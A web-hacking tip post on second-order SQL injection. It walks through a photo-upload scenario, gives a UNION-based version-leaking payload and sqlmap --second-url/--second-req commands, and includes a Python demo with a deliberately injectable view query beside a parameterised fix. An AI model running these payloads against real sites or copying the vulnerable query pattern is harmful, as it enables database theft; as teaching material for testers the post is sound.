# Week 37 - Second Order SQLi

This week’s web hacking tip is on Second-Order SQL injections!

I’m sure most of you are plenty familiar with standard SQLi, but did you know that the result of a payload does not always appear in the response to the request that carried it? Let me explain.

Let’s say we have a web application that lets you upload a photo and give it a name. Once uploaded, the photo appears on ‘view.php’ alongside all the other photos on the site, with its name shown under each photo. Let’s also assume the upload form is vulnerable to UNION-based SQLi in the photo name parameter.

Putting this all together, the injection can only be exploited by sending UNION-based payloads in the upload request and then loading ‘view.php’, which displays all the photos. If all goes well, a payload like `+UNION+ALL+SELECT+1,2,@@version,4,5--+-` will show something like ‘5.6.10’ as the name of the target photo on ‘view.php’.
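To make the two-step flow concrete, here is an added example (mine, not code from the original tip) that models it in Python with an in-memory SQLite database, assuming that upload.php stores the name safely and that view.php then concatenates each stored name into a second lookup query. It shows the vulnerable view beside a parameterised fix, and that the upload response is identical for a benign name and a payload, which is why a check that only inspects the first response reports nothing.

```python
import sqlite3

# Constructed in-memory stand-in for the photo site's database (assumption:
# view.php looks up a caption for each stored photo name in a second query).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE photos (name TEXT, path TEXT)")
    db.execute("CREATE TABLE captions (photo_name TEXT, caption TEXT)")
    db.execute("INSERT INTO captions VALUES ('cat', 'A cat')")
    return db

def upload(db, name, path):
    """upload.php: the INSERT is parameterised, so nothing executes here
    and the response looks identical for a benign name and a payload."""
    db.execute("INSERT INTO photos VALUES (?, ?)", (name, path))
    return "uploaded"

def view_vulnerable(db):
    """view.php (vulnerable): the stored name is trusted and concatenated
    into the caption lookup, so a payload stored earlier executes here."""
    captions = {}
    for (name,) in db.execute("SELECT name FROM photos").fetchall():
        row = db.execute(
            "SELECT caption FROM captions WHERE photo_name = '" + name + "'"
        ).fetchone()
        captions[name] = row[0] if row else None
    return captions

def view_fixed(db):
    """view.php (hardened): same lookup, name bound as a parameter."""
    captions = {}
    for (name,) in db.execute("SELECT name FROM photos").fetchall():
        row = db.execute(
            "SELECT caption FROM captions WHERE photo_name = ?", (name,)
        ).fetchone()
        captions[name] = row[0] if row else None
    return captions

def db_version():
    # The value the stored payload leaks through the vulnerable view.
    return sqlite3.connect(":memory:").execute(
        "SELECT sqlite_version()").fetchone()[0]

def demo():
    # Constructed payload mirroring the tip's version probe; it is invisible
    # in the upload response and only surfaces on the view page.
    payload = "x' UNION ALL SELECT sqlite_version()-- -"
    db = make_db()
    responses = (upload(db, "cat", "/img/1.jpg"), upload(db, payload, "/img/2.jpg"))
    return responses, view_vulnerable(db), view_fixed(db)
```

The fix belongs on the second query: parameterising the INSERT alone, as upload() already does, changes nothing about what the view page renders.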

Now, how do we automate it? Luckily for us, sqlmap supports both `--second-url` and `--second-req`, which let you specify the second URL or request file that actually loads the payload result. So we issue the injection against 'upload.php', then load 'view.php' to read the result:

Get view.php as a URL:

```
sqlmap -r upload_request.txt -p photoName --second-url "http[:]//victim[.]com/view[.]php"
```

Get view.php as a request file:

```
sqlmap -r upload_request.txt -p photoName --second-req view_request.txt
```

Keep this in mind next time you’re dumping a DB!

![](/files/0hYblAzplIWlYONdSJ7j)

